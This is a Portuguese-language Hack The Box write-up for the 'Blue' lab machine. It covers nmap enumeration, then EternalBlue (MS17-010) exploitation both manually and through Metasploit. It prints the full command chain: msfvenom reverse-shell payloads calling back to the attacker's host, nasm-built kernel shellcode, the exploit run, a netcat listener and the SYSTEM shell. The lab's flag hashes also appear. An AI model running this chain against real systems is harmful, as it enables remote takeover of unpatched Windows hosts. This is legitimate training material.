Enumeration
Iniciamos nosso scan utilizando o nmap
root@kali:~/HTB-Windows/Blue# nmap -sV -sC -A -oN nmap/initial 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 16:08 EDT
Nmap scan report for 10.10.10.40
Host is up (0.20s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/21%OT=135%CT=1%CU=40891%PV=Y%DS=2%DC=T%G=Y%TM=5EEFBE
OS:A8%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS
OS:=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=M
OS:54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=20
OS:00)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y
OS:%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0
OS:%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -16m32s, deviation: 34m36s, median: 3m26s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-06-21T21:13:32+01:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-21T20:13:33
|_ start_date: 2020-06-21T20:09:10
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 207.65 ms 10.10.14.1
2 208.13 ms 10.10.10.40
Conseguimos obter informações importantes sobre nosso alvo.
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
Computer name: HARIS-PC
Com essas informações já poderiamos iniciar uma pesquisa por vulnerabilidades para Windows 7, como sabemos o mesmo foi descontinuado desde (O suporte ao Windows 7 terminou em 14 de janeiro de 2020 ) e tem diversos exploits para esse OS.
reference https://support.microsoft.com/pt-br/help/4057281/windows-7-support-ended-on-january-14-2020
Dando continuidade com nosso nmap podemos utilizar novamentes os scripts do nmap para buscar por vulns.
root@kali:~/HTB-Windows/Blue# nmap -p135,139,445,49152,49153,49154,49155,49156,49157 --script vuln -oN nmap/vulns 10.10.10.40
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-21 17:38 EDT
Nmap scan report for 10.10.10.40
Host is up (0.21s latency).
PORT STATE SERVICE
135/tcp open msrpc
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49152/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49153/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49154/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49155/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49156/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49157/tcp open unknown
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
Nmap done: 1 IP address (1 host up) scanned in 113.60 seconds
De acordo com o output temos uma vuln smb-vuln-ms17-010, logo precisamos testar isso e ver se realmente esta vulneravel.
Find exploits
Uma busca rapida encontramos alguns exploits para explorar a vulnerabilidade encontrada
root@kali:~/HTB-Windows/Blue# searchsploit ms17-010
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
----------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Modo manual sem metasploit
Vamos utilizar um dos exploits encontrados, um deles escrito em Python. Copiamos ele em nosso diretorio de expploit criado
root@kali:~/HTB-Windows/Blue# mkdir exploit
root@kali:~/HTB-Windows/Blue# cd exploit/
root@kali:~/HTB-Windows/Blue/exploit# searchsploit -m windows/remote/42315.py
Exploit: Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
URL: https://www.exploit-db.com/exploits/42315
Path: /usr/share/exploitdb/exploits/windows/remote/42315.py
File Type: Python script, ASCII text executable, with CRLF line terminators
Copied to: /root/HTB-Windows/Blue/exploit/42315.py
Antes de executar qualquer codigo em sua maquina é recomendavel voce ler o mesmo
root@kali:~/HTB-Windows/Blue/exploit# ls
42315.py
root@kali:~/HTB-Windows/Blue/exploit# vim 42315.py
root@kali:~/HTB-Windows/Blue/exploit# python 42315.py
Traceback (most recent call last):
File "42315.py", line 3, in <module>
from mysmb import MYSMB
ImportError: No module named mysmb
Observe que falta o modulo mysmb se voce leu o codigo vai ver que tem um link de onde voce pode baixar e se nao tivesse uma busca rapida no Google resolvia o problema.
link download: https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
root@kali:~/HTB-Windows/Blue/exploit# wget https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py -O mysmb.py
--2020-06-21 17:58:10-- https://raw.githubusercontent.com/worawit/MS17-010/master/mysmb.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.204.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.204.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16669 (16K) [text/plain]
Saving to: ‘mysmb.py’
mysmb.py 100%[=======================================================================================>] 16.28K --.-KB/s in 0.1s
2020-06-21 17:58:11 (160 KB/s) - ‘mysmb.py’ saved [16669/16669]
Depois de baixado no mesmo dir que o nosso exploit, podemos entao executar
root@kali:~/HTB-Windows/Blue/exploit# python
42315.py mysmb.py
root@kali:~/HTB-Windows/Blue/exploit# python 42315.py
42315.py <ip> [pipe_name]
root@kali:~/HTB-Windows/Blue/exploit#
Observe que precisamos de um pipe_name, entao utilizando um outro script conseguimos obter rapidamente o que precisamos
reference https://github.com/worawit/MS17-010/blob/master/checker.py
root@kali:~/HTB-Windows/Blue/exploit# wget https://raw.githubusercontent.com/worawit/MS17-010/master/checker.py -O checker.py
--2020-06-21 18:14:53-- https://raw.githubusercontent.com/worawit/MS17-010/master/checker.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.208.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.208.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2495 (2.4K) [text/plain]
Saving to: ‘checker.py’
checker.py 100%[=======================================================================================>] 2.44K --.-KB/s in 0.006s
2020-06-21 18:14:53 (395 KB/s) - ‘checker.py’ saved [2495/2495]
Entao executamos
root@kali:~/HTB-Windows/Blue/exploit# python checker.py
checker.py <ip>
root@kali:~/HTB-Windows/Blue/exploit# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
Bom, nao foi possivel encontrar um que esteja com acesso. Partiremos para outra forma.. Encontrei um site bem legal ensinando como fazer de forma manual.
reference https://root4loot.com/post/eternalblue_manual_exploit/
x64 payload:
1 - Assemble kernel shellcode with nasm:
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~
root@kali:~/HTB-Windows/Blue# nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64_kernel.bin
2 - Generate a binary payload or use an existing one. Name this sc_x64_payload.bin:
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64_kernel.bin
root@kali:~/HTB-Windows/Blue# msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=10.10.14.36 --platform windows -a x64 --format raw -o sc_x64_payload.bin
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_payload.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64_kernel.bin sc_x64_payload.bin
3 - Concentrate payload & shellcode:
root@kali:~/HTB-Windows/Blue# cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin
x86 shellcode:
1 - Assemble kernel shellcode with nasm:
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin
root@kali:~/HTB-Windows/Blue# nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin sc_x86_kernel.bin
2 - Generate a binary payload or use an existing one. Name this sc_x86_payload.bin:
root@kali:~/HTB-Windows/Blue# msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.10.14.36 --platform windows -a x86 --format raw -o sc_x86_payload.bin
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_payload.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin sc_x86_kernel.bin sc_x86_payload.bin
3 - Concentrate payload & shellcode:
root@kali:~/HTB-Windows/Blue# cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py exploit MS17-010 nmap report.ctb report.ctb~ sc_x64.bin sc_x64_kernel.bin sc_x64_payload.bin sc_x86.bin sc_x86_kernel.bin sc_x86_payload.bin
Merging binaries
root@kali:~/HTB-Windows/Blue# python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
root@kali:~/HTB-Windows/Blue# ls
42315.py MS17-010 report.ctb sc_all.bin sc_x64_kernel.bin sc_x86.bin sc_x86_payload.bin
exploit nmap report.ctb~ sc_x64.bin sc_x64_payload.bin sc_x86_kernel.bin
Ative o listen na port 443 usando o nc:
root@kali:~/HTB-Windows# rlwrap nc -nlvp 443
listening on [any] 443 ...
Execute o exploit
root@kali:~/HTB-Windows/Blue# python MS17-010/eternalblue_exploit7.py 10.10.10.40 sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
Sem exito. HUUUUUUUUUUM - Vou reiniciar a maquina e tentar novamente executar o exploit.
root@kali:~/HTB-Windows/Blue# python MS17-010/eternalblue_exploit7.py 10.10.10.40 sc_all.bin
shellcode size: 2203
numGroomConn: 13
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
Ok, sem exito novamente.. Observei que estava dando sempre o mesmo error de INVALID_PARAMETER e justamente isso que estava dando errado. o numGroomConn estava setando automaticamente 13 entao setei para 40
root@kali:~/HTB-Windows/Blue# python MS17-010/eternalblue_exploit7.py 10.10.10.40 sc_all.bin 40
shellcode size: 2203
numGroomConn: 40
Target OS: Windows 7 Professional 7601 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
Depois disso, consegui pegar a shell de SYSTEM
root@kali:~/HTB-Windows# rlwrap nc -nlvp 443 [7/7]
listening on [any] 443 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.10.40] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::a4bc:2080:13c6:d070
Temporary IPv6 Address. . . . . . : dead:beef::a07f:4782:a508:7064
Link-local IPv6 Address . . . . . : fe80::a4bc:2080:13c6:d070%11
IPv4 Address. . . . . . . . . . . : 10.10.10.40
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c0c3%11
10.10.10.2
Tunnel adapter isatap.{CBC67B8A-5031-412C-AEA7-B3186D30360E}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Tunnel adapter Teredo Tunneling Pseudo-Interface:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Windows\system32>
FLAGS ROOT E USER:
C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eb71e920ff6c08843ce9df4e717
C:\Users\Administrator\Desktop>
c:\Users\haris\Desktop>type user.txt
type user.txt
4c546aea7dbee75cbd71de245c8deea9
c:\Users\haris\Desktop>
Method 2 with metasploit
Abra seu msfconsole e procure por ms17_010
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.10.10.40
rhosts => 10.10.10.40
E executamos
msf5 exploit(windows/smb/ms17_010_eternalblue) > run [3/237]
[*] Started reverse TCP handler on 10.10.14.36:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.36:4444 -> 10.10.10.40:49159) at 2020-06-21 19:08:17 -0400
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Temos rapidamente o SYSTEM!
Rascunho
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o ./sc_x64_kernel.bin
msfvenom -p windows/x64/shell_reverse_tcp LPORT=443 LHOST=10.10.14.36 --platform windows -a x64 --format raw -o sc_x64_payload.bin
cat sc_x64_kernel.bin sc_x64_payload.bin > sc_x64.bin
nasm -f bin MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o ./sc_x86_kernel.bin
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=10.10.14.36 --platform windows -a x86 --format raw -o sc_x86_payload.bin
cat sc_x86_kernel.bin sc_x86_payload.bin > sc_x86.bin
python MS17-010/shellcode/eternalblue_sc_merge.py sc_x86.bin sc_x64.bin sc_all.bin
python MS17-010/eternalblue_exploit7.py 10.10.10.40 sc_all.bin 40